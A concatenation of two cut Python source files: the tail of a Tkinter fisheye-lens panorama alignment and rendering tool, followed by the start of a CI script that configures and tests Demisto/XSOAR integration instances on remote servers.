# (The 'command' callback on the SpinBox only applies to the buttons.)
tkvar.trace('w', self._update_callback)
# Create the Label, SpinBox, and Scale objects.
label = tk.Label(parent, text=label)
spbox = tk.Spinbox(parent,
textvariable=tkvar,
from_=-lim, to=lim, increment=res)
slide = tk.Scale(parent,
orient=tk.HORIZONTAL,
showvalue=0,
variable=tkvar,
from_=-lim, to=lim, resolution=res)
label.grid(row=rowidx, column=0, sticky='W')
spbox.grid(row=rowidx, column=1)
slide.grid(row=rowidx, column=2)
return tkvar
# Thin wrapper for update_preview(), used to strip Tkinter arguments.
def _update_callback(self, *args):
# Sanity check that initialization is completed:
if not self.init_done: return
# Determine the render size. (Always 2:1 aspect ratio.)
psize = min(self.preview_frm.winfo_width()/2,
self.preview_frm.winfo_height())
# Render the preview at the given size.
# TODO: Fudge factor of -2 avoids infinite resize loop.
# Is there a better way?
if psize >= 10:
self.update_preview(psize-2)
# Tkinter GUI window for end-to-end alignment and rendering.
class PanoramaGUI:
def __init__(self, parent):
# Store reference object for creating child dialogs.
self.parent = parent
self.win_lens1 = None
self.win_lens2 = None
self.win_align = None
self.work_done = False
self.work_error = None
self.work_status = None
# Create dummy lens configuration.
self.lens1 = FisheyeLens()
self.lens2 = FisheyeLens()
self.lens2.center_qq = [0,0,1,0] # Default flip along Y axis.
# Create frame for this GUI.
parent.wm_title('Panorama Creation Tool')
frame = tk.Frame(parent)
# Make file-selection inputs for the two images.
img_frame = tk.LabelFrame(frame, text='Input Images')
self.img1 = self._make_file_select(img_frame, 0, 'Image #1')
self.img2 = self._make_file_select(img_frame, 1, 'Image #2')
img_frame.pack()
# Make buttons to load, save, and adjust the lens configuration.
lens_frame = tk.LabelFrame(frame, text='Lens Configuration and Alignment')
btn_lens1 = tk.Button(lens_frame, text='Lens 1', command=self._adjust_lens1)
btn_lens2 = tk.Button(lens_frame, text='Lens 2', command=self._adjust_lens2)
btn_align = tk.Button(lens_frame, text='Align', command=self._adjust_align)
btn_auto = tk.Button(lens_frame, text='Auto', command=self._auto_align_start)
btn_load = tk.Button(lens_frame, text='Load', command=self.load_config)
btn_save = tk.Button(lens_frame, text='Save', command=self.save_config)
btn_lens1.grid(row=0, column=0, sticky='NESW')
btn_lens2.grid(row=0, column=1, sticky='NESW')
btn_align.grid(row=0, column=2, sticky='NESW')
btn_auto.grid(row=0, column=3, sticky='NESW')
btn_load.grid(row=1, column=0, columnspan=2, sticky='NESW')
btn_save.grid(row=1, column=2, columnspan=2, sticky='NESW')
lens_frame.pack(fill=tk.BOTH)
# Buttons to render the final output in different modes.
out_frame = tk.LabelFrame(frame, text='Final output rendering')
btn_rect = tk.Button(out_frame, text='Equirectangular',
command=self._render_rect)
btn_cube = tk.Button(out_frame, text='Cubemap',
command=self._render_cube)
btn_rect.pack(fill=tk.BOTH)
btn_cube.pack(fill=tk.BOTH)
out_frame.pack(fill=tk.BOTH)
# Status indicator box.
self.status = tk.Label(frame, relief=tk.SUNKEN,
text='Select input images to begin.')
self.status.pack(fill=tk.BOTH)
# Finish frame creation.
frame.pack()
# Helper function to destroy an object.
def _destroy(self, obj):
if obj is not None:
obj.destroy()
# Popup dialogs for each alignment step.
def _adjust_lens1(self):
self._destroy(self.win_lens1)
try:
self.win_lens1 = tk.Toplevel(self.parent)
FisheyeAlignmentGUI(self.win_lens1, self.img1.get(), self.lens1)
except IOError:
self._destroy(self.win_lens1)
tkMessageBox.showerror('Error', 'Unable to read image file #1.')
except:
self._destroy(self.win_lens1)
tkMessageBox.showerror('Dialog creation error', traceback.format_exc())
def _adjust_lens2(self):
self._destroy(self.win_lens2)
try:
self.win_lens2 = tk.Toplevel(self.parent)
FisheyeAlignmentGUI(self.win_lens2, self.img2.get(), self.lens2)
except IOError:
self._destroy(self.win_lens2)
tkMessageBox.showerror('Error', 'Unable to read image file #2.')
except:
self._destroy(self.win_lens2)
tkMessageBox.showerror('Dialog creation error', traceback.format_exc())
def _adjust_align(self):
self._destroy(self.win_align)
try:
pan = self._create_panorama()
self.win_align = tk.Toplevel(self.parent)
PanoramaAlignmentGUI(self.win_align, pan)
except:
self._destroy(self.win_align)
tkMessageBox.showerror('Dialog creation error', traceback.format_exc())
# Automatic alignment.
# Use worker thread, because this may take a while.
def _auto_align_start(self):
try:
# Create panorama object from within GUI thread, since it depends
# on Tk variables which are NOT thread-safe.
pan = self._create_panorama()
# Display status message and display hourglass...
self._set_status('Starting auto-alignment...', 'wait')
# Create a new worker thread.
work = Thread(target=self._auto_align_work, args=[pan])
work.start()
# Set a timer to periodically check for completion.
self.parent.after(200, self._auto_align_timer)
except:
tkMessageBox.showerror('Auto-alignment error', traceback.format_exc())
def _auto_align_work(self, pan):
try:
# Repeat alignment at progressively higher resolution.
self._auto_align_step(pan, 16, 128, 'Stage 1/4')
self._auto_align_step(pan, 8, 128, 'Stage 2/4')
self._auto_align_step(pan, 4, 192, 'Stage 3/4')
self._auto_align_step(pan, 2, 256, 'Stage 4/4')
# Signal success!
self.work_status = 'Auto-alignment completed.'
self.work_error = None
self.work_done = True
except:
# Signal error.
self.work_status = 'Auto-alignment failed.'
self.work_error = traceback.format_exc()
self.work_done = True
def _auto_align_step(self, pan, scale, psize, label):
# Update status message.
self.work_status = 'Auto-alignment: ' + str(label)
# Create a panorama object at 1/scale times original resolution.
pan_sc = deepcopy(pan)
pan_sc.downsample(scale)
# Run optimization, rendering each hypothesis at the given resolution.
pan_sc.optimize(psize)
# Update local lens parameters.
# Note: These are not Tk variables, so are safe to change.
self.lens1 = pan_sc.scale_lens(0, scale)
self.lens2 = pan_sc.scale_lens(1, scale)
# Timer callback object checks outputs from worker thread.
# (Tkinter objects are NOT thread safe.)
def _auto_align_timer(self, *args):
# Check thread status.
if self.work_done:
# Update status message, with popup on error.
if self.work_status is not None:
self._set_status(self.work_status)
if self.work_error is not None:
self._set_status('Auto-alignment failed.')
tkMessageBox.showerror('Auto-alignment error', self.work_error)
# Clear the 'done' flag for future runs.
self.work_done = False
else:
# Update status message and keep hourglass.
if self.work_status is not None:
self._set_status(self.work_status, 'wait')
# Reset timer to be called again.
self.parent.after(200, self._auto_align_timer)
# Create panorama object using current settings.
def _create_panorama(self):
img1 = FisheyeImage(self.img1.get(), self.lens1)
img2 = FisheyeImage(self.img2.get(), self.lens2)
return PanoramaImage((img1, img2))
# Load or save lens configuration and alignment.
def load_config(self, filename=None):
if filename is None:
file_obj = tkFileDialog.askopenfile()
if file_obj is None: return
else:
file_obj = open(filename, 'r')
try:
load_config(file_obj, self.lens1, self.lens2)
except:
tkMessageBox.showerror('Config load error', traceback.format_exc())
def save_config(self, filename=None):
if filename is None:
file_obj = tkFileDialog.asksaveasfile()
if file_obj is None: return
else:
file_obj = open(filename, 'w')
try:
save_config(file_obj, self.lens1, self.lens2)
except:
tkMessageBox.showerror('Config save error', traceback.format_exc())
# Render and save output in various modes.
def _render_generic(self, render_type, render_size=1024):
# Popup asks user for output file.
file_obj = tkFileDialog.asksaveasfile(mode='wb')
# Abort if user clicks 'cancel'.
if file_obj is None: return
# Proceed with rendering...
self._set_status('Rendering image: ' + file_obj.name, 'wait')
try:
panorama = self._create_panorama()
render_func = getattr(panorama, render_type)
render_func(render_size).save(file_obj)
self._set_status('Done!')
except:
tkMessageBox.showerror('Render error', traceback.format_exc())
self._set_status('Render failed.')
def _render_rect(self):
self._render_generic('render_equirectangular')
def _render_cube(self):
self._render_generic('render_cubemap')
# Callback to create a file-selection popup.
def _file_select(self, tkstr):
result = tkFileDialog.askopenfile()
if result is not None:
tkstr.set(result.name)
result.close()
# Make a combined label/textbox/slider for a given variable:
def _make_file_select(self, parent, rowidx, label):
# Create string variable.
tkstr = tk.StringVar()
# Create callback event handler.
cmd = lambda: self._file_select(tkstr)
# Create the Label, Entry, and Button objects.
label = tk.Label(parent, text=label)
entry = tk.Entry(parent, textvariable=tkstr)
button = tk.Button(parent, text='...', command=cmd)
label.grid(row=rowidx, column=0, sticky='W')
entry.grid(row=rowidx, column=1)
button.grid(row=rowidx, column=2)
return tkstr
# Set status text, and optionally update cursor.
def _set_status(self, status, cursor='arrow'):
self.parent.config(cursor=cursor)
self.status.configure(text=status)
def launch_tk_gui(flens='', fimg1='', fimg2=''):
# Create TK root object and GUI window.
root = tk.Tk()
gui = PanoramaGUI(root)
# Load parameters if specified.
if flens is not None and len(flens) > 0:
gui.load_config(flens)
if fimg1 is not None and len(fimg1) > 0:
gui.img1.set(fimg1)
if fimg2 is not None and len(fimg2) > 0:
gui.img2.set(fimg2)
# Start main loop.
root.mainloop()
if __name__ == "__main__":
# If we have exactly four arguments, run command-line version.
if len(sys.argv) == 5 and sys.argv[4].startswith('gui'):
# Special case for interactive mode.
launch_tk_gui(sys.argv[1], sys.argv[2], sys.argv[3])
elif len(sys.argv) == 5:
# First argument is the lens alignment file.
lens1 = FisheyeLens()
lens2 = FisheyeLens()
cfg = open(sys.argv[1], 'r')
load_config(cfg, lens1, lens2)
# Second and third arguments are the source files.
img1 = FisheyeImage(sys.argv[2], lens1)
img2 = FisheyeImage(sys.argv[3], lens2)
# Fourth argument is the mode and output filename.
if sys.argv[4].startswith('cube='):
out = sys.argv[5:]
pan = PanoramaImage((img1, img2))
pan.render_cubemap(1024).save(out)
elif sys.argv[4].startswith('rect='):
out = sys.argv[5:]
pan = PanoramaImage((img1, img2))
pan.render_equirectangular(1024).save(out)
else:
print 'Unrecognized render mode (cube=, rect=, gui)'
elif len(sys.argv) > 1:
# If requested, print command-line usage information.
print 'Usage instructions:'
print ' python fisheye.py'
print ' Start interactive alignment GUI.'
print ' python fisheye.py -help'
print ' Print this help message.'
print ' python fisheye.py lens.cfg in1.jpg in2.jpg gui'
print ' Launch interactive GUI with specified default options'
print ' python fisheye.py lens.cfg in1.jpg in2.jpg rect=out.png'
print ' Render and save equirectangular panorama using specified'
print ' lens configuration and source images.'
print ' python fisheye.py lens.cfg in1.jpg in2.jpg cube=out.png'
print ' Render and save cubemap panorama using specified'
print ' lens configuration and source images.'
else:
# Otherwise, start the interactive GUI with all fields blank.
launch_tk_gui()
|
configure_and_test_integration_instances.py
|
from __future__ import print_function
import argparse
import ast
import json
import os
import subprocess
import sys
import uuid
import zipfile
from datetime import datetime
from distutils.version import LooseVersion
from enum import IntEnum
from pprint import pformat
from threading import Thread
from time import sleep
from typing import List, Tuple, Union
from urllib.parse import quote_plus
import demisto_client
from demisto_sdk.commands.test_content.constants import SSH_USER
from ruamel import yaml
from Tests.Marketplace.search_and_install_packs import search_and_install_packs_and_their_dependencies, \
upload_zipped_packs, install_all_content_packs_for_nightly
from Tests.scripts.utils.log_util import install_logging
from Tests.scripts.utils import logging_wrapper as logging
from Tests.test_content import extract_filtered_tests, get_server_numeric_version
from Tests.test_integration import __get_integration_config, __test_integration_instance, disable_all_integrations
from Tests.tools import run_with_proxy_configured
from Tests.update_content_data import update_content
from demisto_sdk.commands.common.constants import FileType
from demisto_sdk.commands.common.tools import run_threads_list, run_command, get_yaml, \
str2bool, format_version, find_type
from demisto_sdk.commands.test_content.mock_server import MITMProxy, run_with_mock, RESULT
from demisto_sdk.commands.test_content.tools import update_server_configuration, is_redhat_instance
from demisto_sdk.commands.validate.validate_manager import ValidateManager
MARKET_PLACE_MACHINES = ('master',)
SKIPPED_PACKS = ['NonSupported', 'ApiModules']
NO_PROXY = ','.join([
'oproxy.demisto.ninja',
'oproxy-dev.demisto.ninja',
])
NO_PROXY_CONFIG = {'python.pass.extra.keys': f'--env##no_proxy={NO_PROXY}'} # noqa: E501
DOCKER_HARDENING_CONFIGURATION = {
'docker.cpu.limit': '1.0',
'docker.run.internal.asuser': 'true',
'limit.docker.cpu': 'true',
'python.pass.extra.keys': f'--memory=1g##--memory-swap=-1##--pids-limit=256##--ulimit=nofile=1024:8192##--env##no_proxy={NO_PROXY}', # noqa: E501
'powershell.pass.extra.keys': f'--env##no_proxy={NO_PROXY}',
}
DOCKER_HARDENING_CONFIGURATION_FOR_PODMAN = {
'docker.run.internal.asuser': 'true'
}
MARKET_PLACE_CONFIGURATION = {
'content.pack.verify': 'false',
'marketplace.initial.sync.delay': '0',
'content.pack.ignore.missing.warnings.contentpack': 'true'
}
AVOID_DOCKER_IMAGE_VALIDATION = {
'content.validate.docker.images': 'false'
}
ID_SET_PATH = './artifacts/id_set.json'
class Running(IntEnum):
CI_RUN = 0
WITH_OTHER_SERVER = 1
WITH_LOCAL_SERVER = 2
class Server:
def __init__(self, internal_ip, port, user_name, password):
self.__ssh_client = None
self.__client = None
self.internal_ip = internal_ip
self.ssh_tunnel_port = port
self.user_name = user_name
self.password = password
def __str__(self):
return self.internal_ip
@property
def client(self):
if self.__client is None:
self.__client = self.reconnect_client()
return self.__client
def reconnect_client(self):
self.__client = demisto_client.configure(f'https://localhost:{self.ssh_tunnel_port}',
verify_ssl=False,
username=self.user_name,
password=self.password)
return self.__client
def add_server_configuration(self, config_dict, error_msg, restart=False):
update_server_configuration(self.client, config_dict, error_msg)
if restart:
self.exec_command('sudo systemctl restart demisto')
def exec_command(self, command):
subprocess.check_output(f'ssh {SSH_USER}@{self.internal_ip} {command}'.split(),
stderr=subprocess.STDOUT)
def get_id_set(id_set_path) -> Union[dict, None]:
"""
Used to collect the ID set so it can be passed to the Build class on init.
:return: ID set as a dict if it exists.
"""
if os.path.isfile(id_set_path):
return get_json_file(id_set_path)
return None
class Build:
# START CHANGE ON LOCAL RUN #
content_path = f'{os.getenv("HOME")}/project' if os.getenv('CIRCLECI') else os.getenv('CI_PROJECT_DIR')
test_pack_target = f'{os.getenv("HOME")}/project/Tests' if os.getenv('CIRCLECI') else f'{os.getenv("CI_PROJECT_DIR")}/Tests' # noqa
key_file_path = 'Use in case of running with non local server'
run_environment = Running.CI_RUN
env_results_path = f'{os.getenv("ARTIFACTS_FOLDER")}/env_results.json'
DEFAULT_SERVER_VERSION = '99.99.98'
# END CHANGE ON LOCAL RUN #
def __init__(self, options):
self._proxy = None
self.git_sha1 = options.git_sha1
self.branch_name = options.branch
self.ci_build_number = options.build_number
self.is_nightly = options.is_nightly
self.ami_env = options.ami_env
self.server_to_port_mapping, self.server_numeric_version = self.get_servers(options.ami_env)
self.secret_conf = get_json_file(options.secret)
self.username = options.user if options.user else self.secret_conf.get('username')
self.password = options.password if options.password else self.secret_conf.get('userPassword')
self.servers = [Server(internal_ip,
port,
self.username,
self.password) for internal_ip, port in self.server_to_port_mapping.items()]
self.is_private = options.is_private
conf = get_json_file(options.conf)
self.tests = conf['tests']
self.skipped_integrations_conf = conf['skipped_integrations']
self.unmockable_integrations = conf['unmockable_integrations']
id_set_path = options.id_set_path if options.id_set_path else ID_SET_PATH
self.id_set = get_id_set(id_set_path)
self.test_pack_path = options.test_pack_path if options.test_pack_path else None
self.tests_to_run = self.fetch_tests_list(options.tests_to_run)
self.content_root = options.content_root
self.pack_ids_to_install = self.fetch_pack_ids_to_install(options.pack_ids_to_install)
self.service_account = options.service_account
@property
def proxy(self) -> MITMProxy:
"""
A property method that should create and return a single proxy instance through out the build
Returns:
The single proxy instance that should be used in this build.
"""
if not self._proxy:
self._proxy = MITMProxy(self.servers[0].internal_ip,
logging_module=logging,
build_number=self.ci_build_number,
branch_name=self.branch_name)
return self._proxy
@staticmethod
def fetch_tests_list(tests_to_run_path: str):
"""
Fetches the test list from the filter.
:param tests_to_run_path: Path to location of test filter.
:return: List of tests if there are any, otherwise empty list.
"""
tests_to_run = []
with open(tests_to_run_path, "r") as filter_file:
tests_from_file = filter_file.readlines()
for test_from_file in tests_from_file:
test_clean = test_from_file.rstrip()
tests_to_run.append(test_clean)
return tests_to_run
@staticmethod
def fetch_pack_ids_to_install(packs_to_install_path: str):
"""
Fetches the test list from the filter.
:param packs_to_install_path: Path to location of pack IDs to install file.
:return: List of Pack IDs if there are any, otherwise empty list.
"""
tests_to_run = []
with open(packs_to_install_path, "r") as filter_file:
tests_from_file = filter_file.readlines()
for test_from_file in tests_from_file:
test_clean = test_from_file.rstrip()
tests_to_run.append(test_clean)
return tests_to_run
@staticmethod
def get_servers(ami_env):
env_conf = get_env_conf()
server_to_port_mapping = map_server_to_port(env_conf, ami_env)
if Build.run_environment == Running.CI_RUN:
server_numeric_version = get_server_numeric_version(ami_env)
else:
server_numeric_version = Build.DEFAULT_SERVER_VERSION
return server_to_port_mapping, server_numeric_version
def options_handler():
parser = argparse.ArgumentParser(description='Utility for instantiating and testing integration instances')
parser.add_argument('-u', '--user', help='The username for the login', required=True)
parser.add_argument('-p', '--password', help='The password for the login', required=True)
parser.add_argument('--ami_env', help='The AMI environment for the current run. Options are '
'"Server Master", "Server 6.0". '
'The server url is determined by the AMI environment.')
parser.add_argument('-g', '--git_sha1', help='commit sha1 to compare changes with')
parser.add_argument('-c', '--conf', help='Path to conf file', required=True)
parser.add_argument('-s', '--secret', help='Path to secret conf file')
parser.add_argument('-n', '--is-nightly', type=str2bool, help='Is nightly build')
parser.add_argument('-pr', '--is_private', type=str2bool, help='Is private build')
parser.add_argument('--branch', help='GitHub branch name', required=True)
parser.add_argument('--build-number', help='CI job number where the instances were created', required=True)
parser.add_argument('--test_pack_path', help='Path to where the test pack will be saved.',
default='/home/runner/work/content-private/content-private/content/artifacts/packs')
parser.add_argument('--content_root', help='Path to the content root.',
default='/home/runner/work/content-private/content-private/content')
parser.add_argument('--id_set_path', help='Path to the ID set.')
parser.add_argument('-l', '--tests_to_run', help='Path to the Test Filter.',
default='./artifacts/filter_file.txt')
parser.add_argument('-pl', '--pack_ids_to_install', help='Path to the packs to install file.',
default='./artifacts/content_packs_to_install.txt')
# disable-secrets-detection-start
parser.add_argument('-sa', '--service_account',
help=("Path to gcloud service account, is for circleCI usage. "
"For local development use your personal account and "
"authenticate using Google Cloud SDK by running: "
"`gcloud auth application-default login` and leave this parameter blank. "
"For more information go to: "
"https://googleapis.dev/python/google-api-core/latest/auth.html"),
required=False)
# disable-secrets-detection-end
options = parser.parse_args()
return options
def check_test_version_compatible_with_server(test, server_version):
"""
Checks if a given test is compatible wis the given server version.
Arguments:
test: (dict)
Test playbook object from content conf.json. May contain the following fields: "playbookID",
"integrations", "instance_names", "timeout", "nightly", "fromversion", "toversion.
server_version: (int)
The server numerical version.
Returns:
(bool) True if test is compatible with server version or False otherwise.
"""
test_from_version = format_version(test.get('fromversion', '0.0.0'))
test_to_version = format_version(test.get('toversion', '99.99.99'))
server_version = format_version(server_version)
if not LooseVersion(test_from_version) <= LooseVersion(server_version) <= LooseVersion(test_to_version):
playbook_id = test.get('playbookID')
logging.debug(
f'Test Playbook: {playbook_id} was ignored in the content installation test due to version mismatch '
f'(test versions: {test_from_version}-{test_to_version}, server version: {server_version})')
return False
return True
def filter_tests_with_incompatible_version(tests, server_version):
"""
Filter all tests with incompatible version to the given server.
Arguments:
tests: (list)
List of test objects.
server_version: (int)
The server numerical version.
Returns:
(lst): List of filtered tests (compatible version)
"""
filtered_tests = [test for test in tests if
check_test_version_compatible_with_server(test, server_version)]
return filtered_tests
def configure_integration_instance(integration, client, placeholders_map):
"""
Configure an instance for an integration
Arguments:
integration: (dict)
Integration object whose params key-values are set
client: (demisto_client)
The client to connect to
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
Returns:
(dict): Configured integration instance
"""
integration_name = integration.get('name')
logging.info(f'Configuring instance for integration "{integration_name}"')
integration_instance_name = integration.get('instance_name', '')
integration_params = change_placeholders_to_values(placeholders_map, integration.get('params'))
is_byoi = integration.get('byoi', True)
validate_test = integration.get('validate_test', True)
integration_configuration = __get_integration_config(client, integration_name)
if not integration_configuration:
return None
# In the integration configuration in content-test-conf conf.json, the test_validate flag was set to false
if not validate_test:
logging.debug(f'Skipping configuration for integration: {integration_name} (it has test_validate set to false)')
return None
module_instance = set_integration_instance_parameters(integration_configuration, integration_params,
integration_instance_name, is_byoi, client)
return module_instance
def filepath_to_integration_name(integration_file_path):
"""Load an integration file and return the integration name.
Args:
integration_file_path (str): The path to an integration yml file.
Returns:
(str): The name of the integration.
"""
integration_yaml = get_yaml(integration_file_path)
integration_name = integration_yaml.get('name')
return integration_name
def get_integration_names_from_files(integration_files_list):
integration_names_list = [filepath_to_integration_name(path) for path in integration_files_list]
return [name for name in integration_names_list if name] # remove empty values
def get_new_and_modified_integration_files(branch_name):
"""Return 2 lists - list of new integrations and list of modified integrations since the first commit of the branch.
Args:
branch_name: The branch name against which we will run the 'git diff' command.
Returns:
(tuple): Returns a tuple of two lists, the file paths of the new integrations and modified integrations.
"""
# get changed yaml files (filter only added and modified files)
file_validator = ValidateManager(skip_dependencies=True)
file_validator.branch_name = branch_name
modified_files, added_files, _, _ = file_validator.get_changed_files_from_git()
new_integration_files = [
file_path for file_path in added_files if
find_type(file_path) in [FileType.INTEGRATION, FileType.BETA_INTEGRATION]
]
modified_integration_files = [
file_path for file_path in modified_files if
isinstance(file_path, str) and find_type(file_path) in [FileType.INTEGRATION, FileType.BETA_INTEGRATION]
]
return new_integration_files, modified_integration_files
def is_content_update_in_progress(client):
"""Make request to check if content is updating.
Args:
client (demisto_client): The configured client to use.
Returns:
(str): Returns the request response data which is 'true' if updating and 'false' if not.
"""
host = client.api_client.configuration.host
logging.debug(f'Making "Get" request to server - "{host}" to check if content is installing.')
# make request to check if content is updating
response_data, status_code, _ = demisto_client.generic_request_func(self=client, path='/content/updating',
method='GET', accept='application/json')
if status_code >= 300 or status_code < 200:
result_object = ast.literal_eval(response_data)
message = result_object.get('message', '')
logging.error(f"Failed to check if content is installing - with status code {status_code}\n{message}")
return 'request unsuccessful'
return response_data
def get_content_version_details(client, ami_name):
"""Make request for details about the content installed on the demisto instance.
Args:
client (demisto_client): The configured client to use.
ami_name (string): the role name of the machine
Returns:
(tuple): The release version and asset ID of the content installed on the demisto instance.
"""
host = client.api_client.configuration.host
logging.info(f'Making "POST" request to server - "{host}" to check installed content.')
# make request to installed content details
uri = '/content/installedlegacy' if ami_name in MARKET_PLACE_MACHINES else '/content/installed'
response_data, status_code, _ = demisto_client.generic_request_func(self=client, path=uri,
method='POST')
try:
result_object = ast.literal_eval(response_data)
logging.debug(f'Response was {response_data}')
except ValueError:
logging.exception('failed to parse response from demisto.')
return '', 0
if status_code >= 300 or status_code < 200:
message = result_object.get('message', '')
logging.error(f'Failed to check if installed content details - with status code {status_code}\n{message}')
return result_object.get('release', ''), result_object.get('assetId', 0)
def change_placeholders_to_values(placeholders_map, config_item):
"""Replaces placeholders in the object to their real values
Args:
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
config_item: (json object)
Integration configuration object.
Returns:
dict. json object with the real configuration.
"""
item_as_string = json.dumps(config_item)
for key, value in placeholders_map.items():
item_as_string = item_as_string.replace(key, str(value))
return json.loads(item_as_string)
def set_integration_params(build,
integrations,
secret_params,
instance_names,
placeholders_map,
logging_module=logging):
"""
For each integration object, fill in the parameter values needed to configure an instance from
the secret_params taken from our secret configuration file. Because there may be a number of
configurations for a single integration (if there are values provided in our secret conf for
multiple different instances of the same integration) then selects the parameter values for the
configuration of the instance whose instance is in 'instance_names' (will take the last one listed
in 'secret_params'). Note that this function does not explicitly return the modified 'integrations'
object but rather it modifies the 'integrations' object since it is passed by reference and not by
value, so the 'integrations' object that was passed to this function will have been changed once
this function has completed execution and gone out of scope.
Arguments:
build: Build object
integrations: (list of dicts)
List of integration objects whose 'params' attribute will be populated in this function.
secret_params: (list of dicts)
List of secret configuration values for all of our integrations (as well as specific
instances of said integrations).
instance_names: (list)
The names of particular instances of an integration to use the secret_params of as the
configuration values.
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
logging_module (Union[ParallelLoggingManager,logging]): The logging module to use
Returns:
(bool): True if integrations params were filled with secret configuration values, otherwise false
"""
for integration in integrations:
integration_params = [change_placeholders_to_values(placeholders_map, item) for item
in secret_params if item['name'] == integration['name']]
if integration_params:
matched_integration_params = integration_params[0]
# if there are more than one integration params, it means that there are configuration
# values in our secret conf for multiple instances of the given integration and now we
# need to match the configuration values to the proper instance as specified in the
# 'instance_names' list argument
if len(integration_params) != 1:
found_matching_instance = False
for item in integration_params:
if item.get('instance_name', 'Not Found') in instance_names:
matched_integration_params = item
found_matching_instance = True
if not found_matching_instance:
optional_instance_names = [optional_integration.get('instance_name', 'None')
for optional_integration in integration_params]
failed_match_instance_msg = 'There are {} instances of {}, please select one of them by using' \
' the instance_name argument in conf.json. The options are:\n{}'
logging_module.error(failed_match_instance_msg.format(len(integration_params),
integration['name'],
'\n'.join(optional_instance_names)))
return False
integration['params'] = matched_integration_params.get('params', {})
integration['byoi'] = matched_integration_params.get('byoi', True)
integration['instance_name'] = matched_integration_params.get('instance_name', integration['name'])
integration['validate_test'] = matched_integration_params.get('validate_test', True)
if integration['name'] not in build.unmockable_integrations:
integration['params'].update({'proxy': True})
logging.debug(
f'Configuring integration "{integration["name"]}" with proxy=True')
else:
integration['params'].update({'proxy': False})
logging.debug(
f'Configuring integration "{integration["name"]}" with proxy=False')
return True
def set_module_params(param_conf, integration_params):
"""Configure a parameter object for use in a module instance.
Each integration parameter is actually an object with many fields that together describe it. E.g. a given
parameter will have all of the following fields - "name", "display", "value", "hasvalue", "defaultValue",
etc. This function fills the "value" field for a parameter configuration object and returns it for use in
a module instance.
Args:
param_conf (dict): The parameter configuration object.
integration_params (dict): The values to use for an integration's parameters to configure an instance.
Returns:
(dict): The configured parameter object
"""
if param_conf['display'] in integration_params or param_conf['name'] in integration_params:
# param defined in conf
key = param_conf['display'] if param_conf['display'] in integration_params else param_conf['name']
if key == 'credentials':
credentials = integration_params[key]
param_value = {
'credential': '',
'identifier': credentials['identifier'],
'password': credentials['password'],
'passwordChanged': False
}
else:
param_value = integration_params[key]
param_conf['value'] = param_value
param_conf['hasvalue'] = True
elif param_conf['defaultValue']:
# if the parameter doesn't have a value provided in the integration's configuration values
# but does have a default value then assign it to the parameter for the module instance
param_conf['value'] = param_conf['defaultValue']
return param_conf
def __set_server_keys(client, integration_params, integration_name):
"""Adds server configuration keys using the demisto_client.
Args:
client (demisto_client): The configured client to use.
integration_params (dict): The values to use for an integration's parameters to configure an instance.
integration_name (str): The name of the integration which the server configurations keys are related to.
"""
if 'server_keys' not in integration_params:
return
logging.info(f'Setting server keys for integration: {integration_name}')
data: dict = {
'data': {},
'version': -1
}
for key, value in integration_params.get('server_keys').items():
data['data'][key] = value
update_server_configuration(
client=client,
server_configuration=data,
error_msg='Failed to set server keys'
)
def set_integration_instance_parameters(integration_configuration,
integration_params,
integration_instance_name,
is_byoi,
client):
"""Set integration module values for integration instance creation
The integration_configuration and integration_params should match, in that
they are for the same integration
Arguments:
integration_configuration: (dict)
dictionary of the integration configuration parameters/keys that need
filling to instantiate an instance of a given integration
integration_params: (dict)
values for a given integration taken from the configuration file in
which the secret values are stored to configure instances of various
integrations
integration_instance_name: (str)
The name of the integration instance being configured if there is one
provided in the conf.json
is_byoi: (bool)
If the integration is byoi or not
client: (demisto_client)
The client to connect to
Returns:
(dict): The configured module instance to send to the Demisto server for
instantiation.
"""
module_configuration = integration_configuration.get('configuration', {})
if not module_configuration:
module_configuration = []
if 'integrationInstanceName' in integration_params:
instance_name = integration_params['integrationInstanceName']
else:
instance_name = '{}_test_{}'.format(integration_instance_name.replace(' ', '_'), str(uuid.uuid4()))
# define module instance
module_instance = {
'brand': integration_configuration['name'],
'category': integration_configuration['category'],
'configuration': integration_configuration,
'data': [],
'enabled': "true",
'engine': '',
'id': '',
'isIntegrationScript': is_byoi,
'name': instance_name,
'passwordProtected': False,
'version': 0
}
# set server keys
__set_server_keys(client, integration_params, integration_configuration['name'])
# set module params
for param_conf in module_configuration:
configured_param = set_module_params(param_conf, integration_params)
module_instance['data'].append(configured_param)
return module_instance
def group_integrations(integrations, skipped_integrations_conf, new_integrations_names, modified_integrations_names):
"""
Filter integrations into their respective lists - new, modified or unchanged. if it's on the skip list, then
skip if random tests were chosen then we may be configuring integrations that are neither new or modified.
Args:
integrations (list): The integrations to categorize.
skipped_integrations_conf (dict): Integrations that are on the skip list.
new_integrations_names (list): The names of new integrations.
modified_integrations_names (list): The names of modified integrations.
Returns:
(tuple): Lists of integrations objects as well as an Integration-to-Status dictionary useful for logs.
"""
new_integrations = []
modified_integrations = []
unchanged_integrations = []
integration_to_status = {}
for integration in integrations:
integration_name = integration.get('name', '')
if integration_name in skipped_integrations_conf.keys():
continue
if integration_name in new_integrations_names:
new_integrations.append(integration)
elif integration_name in modified_integrations_names:
modified_integrations.append(integration)
integration_to_status[integration_name] = 'Modified Integration'
else:
unchanged_integrations.append(integration)
integration_to_status[integration_name] = 'Unchanged Integration'
return new_integrations, modified_integrations, unchanged_integrations, integration_to_status
def get_integrations_for_test(test, skipped_integrations_conf):
"""Return a list of integration objects that are necessary for a test (excluding integrations on the skip list).
Args:
test (dict): Test dictionary from the conf.json file containing the playbookID, integrations and
instance names.
skipped_integrations_conf (dict): Skipped integrations dictionary with integration names as keys and
the skip reason as values.
Returns:
(list): List of integration objects to configure.
"""
integrations_conf = test.get('integrations', [])
if not isinstance(integrations_conf, list):
integrations_conf = [integrations_conf]
integrations = [
{'name': integration, 'params': {}} for
integration in integrations_conf if integration not in skipped_integrations_conf
]
return integrations
def update_content_on_demisto_instance(client, server, ami_name):
"""Try to update the content
Args:
client (demisto_client): The configured client to use.
server (str): The server url to pass to Tests/update_content_data.py
"""
content_zip_path = 'artifacts/all_content.zip'
update_content(content_zip_path, server=server, client=client)
# Check if content update has finished installing
sleep_interval = 20
updating_content = is_content_update_in_progress(client)
while updating_content.lower() == 'true':
sleep(sleep_interval)
updating_content = is_content_update_in_progress(client)
if updating_content.lower() == 'request unsuccessful':
# since the request to check if content update installation finished didn't work, can't use that mechanism
# to check and just try sleeping for 30 seconds instead to allow for content update installation to complete
